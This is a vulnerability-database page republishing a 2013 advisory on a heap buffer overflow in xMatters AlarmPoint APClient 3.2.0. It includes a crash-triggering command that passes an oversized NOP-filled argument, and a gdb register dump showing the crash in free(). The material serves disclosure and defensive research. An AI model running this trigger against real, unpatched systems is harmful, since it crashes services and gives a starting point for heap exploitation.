Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

xMatters Alarmpoint BoF-0day

🗓️ 15 Feb 2013 00:00:00Reported by Juan SaccoType 
zdt
 zdt🔗 0day.today👁 41 Views

Heap Buffer Overflow in xMatters AlarmPoint APClient, APClient 3.2.0, no available patc

Code
Information
 --------------------

 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High

 Description
 ------------------
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 -------------------
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follow:
 Submit a malicious file cointaining the exploit
 [email protected]:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: 
 /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 
 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax            0xa303924        170932516
 ecx            0xbfb8   49080
 edx            0xa303924        170932516
 ebx            0x8059438        134583352
 esp            0xbfff3620       0xbfff3620
 ebp            0xbfff3638       0xbfff3638
 esi            0x8059440        134583360
 edi            0x80653f0        134632432
 eip            0x804be8a        0x804be8a <free+126>
 eflags         0x210206 [ PF IF RF ID ]
 cs             0x73     115
 ss             0x7b     123
 ds             0x7b     123
 es             0x7b     123
 fs             0x0      0
 gs             0x33     51
 (gdb)


 Solution
 -------------------
 No patch are available at this time.

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Feb 2013 00:00Current
7.1High risk
Vulners AI Score7.1
xmatters alarmpointheap buffer overflowapclient 3.2.0vulnerabilitysegmentation faultintegration apiexploit
41